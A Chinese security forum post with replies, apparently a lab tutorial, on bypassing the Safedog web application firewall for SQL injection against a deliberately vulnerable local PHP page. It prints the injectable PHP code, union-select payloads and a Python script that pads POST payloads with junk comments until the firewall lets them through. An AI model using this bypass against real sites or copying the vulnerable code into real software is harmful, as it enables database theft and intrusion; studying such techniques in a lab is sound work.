用户
搜索
  • TA的每日心情
    郁闷
    18 分钟前
  • 签到天数: 147 天

    连续签到: 7 天

    [LV.7]常住居民III

    实习版主

    Rank: 7Rank: 7Rank: 7

    10

    主题

    160

    帖子

    573

    魔法币
    收听
    0
    粉丝
    5
    注册时间
    2017-7-18

    积极活跃奖核心白帽

    发表于 2019-9-30 11:59:10 84906
    首先祝大家国庆节玩的开心,国庆小七天,窝在家里学习多好呀~~
    直接进入正题...............
    0x01 实验环境:
    python3   requests库
    phpstudy(集成环境 改为系统模式)
      
    111.png
    安全狗 apache2.4(把防cc的关了,不然后面会拦住)
    222.png

    0x02 靶机代码:

    [PHP] 纯文本查看 复制代码
    <?php
    $con = mysql_connect("localhost","root","root");
    if (!$con){die('Could not connect: ' . mysql_error());}
    mysql_select_db("test", $con);
    $id = $_REQUEST[ 'id' ];
    $query  = "SELECT * FROM users WHERE id = $id ";
    $result = mysql_query($query);
    while($row = mysql_fetch_array($result))
      {
      echo $row['0'] . " " . $row['1'];
      echo "<br />";
      }
    echo "<br/>";
    echo $query;
    mysql_close($con);
    ?>

    创建一个test数据库,之后在通过参数id进行操作

    如图

    333.png


    0x03 开始注入:
    id为int 不需要闭合
    http://192.168.0.106/zr.php?id=1 and 1=1 拦截
    444.png
    之后在网上找了N种方法。。/**/注释等等等。。最终都是无果
    如果提交内容存在敏感的关键字,,还是会被拦截
    555.png

    拿出我的大保健~~
    而像软waf的话,如果提交的数据量过多。就会直接扔到后端去处理
    get不能提交过多的数据,用post
    写了个简单的python脚本 通过叠加无用的字符,并检测是否绕过waf
    我们的payload  1 /*无用的字符*/  union select user(),2
    import requests
    url = "http://192.168.0.106/zr.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
    }
    try:
        for i in range(1,5000):
            st = "/*"+"ABC"*i+"*/ union select user(),2"
            data={
                 "id":"1 %s " %st
                }
            print(i)
            res= requests.post(url,headers=headers,data=data).text
            print(data)
            print(res)
    except:
        print('终止执行')

    运行下试试

    666.png

    执行3000多次的时候,已经成功绕过安全狗!

    777.png

    放到BURP测试一下 把get转为post(成功绕过)
    888.png
    0X04 结尾:
    像网上大多数常用的waf,好多都可以通过超长字符进行绕过,waf如果处理不过来的话会直接丢给后端进行处理。。
    最后:欢迎学习交流 q36222404



    路漫漫,
    这都可以?怎么可能。
    使用道具 举报 回复
    发表于 2019-9-30 17:25:57
    手机用户1iKQTf 发表于 2019-9-30 09:21
    这都可以?怎么可能。

    你可以试试
    路漫漫,
    使用道具 举报 回复
    发表于 2019-10-1 09:51:22
    可以通过超长字符进行绕过,waf如果处理不过来的话会直接丢给后端进行处理
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    发表于 2019-10-8 22:10:35
    好思路,学习!
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2019-10-9 11:30:10
    称狗不注意,就绕过去了
    使用道具 举报 回复
    发表于 2019-10-10 18:59:43
    哈哈哈有意思啊啊哈哈
    使用道具 举报 回复


    手机用户EzGD96 i春秋-呆萌菜鸟 推荐
    发表于 昨天 10:10
    强大强大强大强大强大强大强大
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册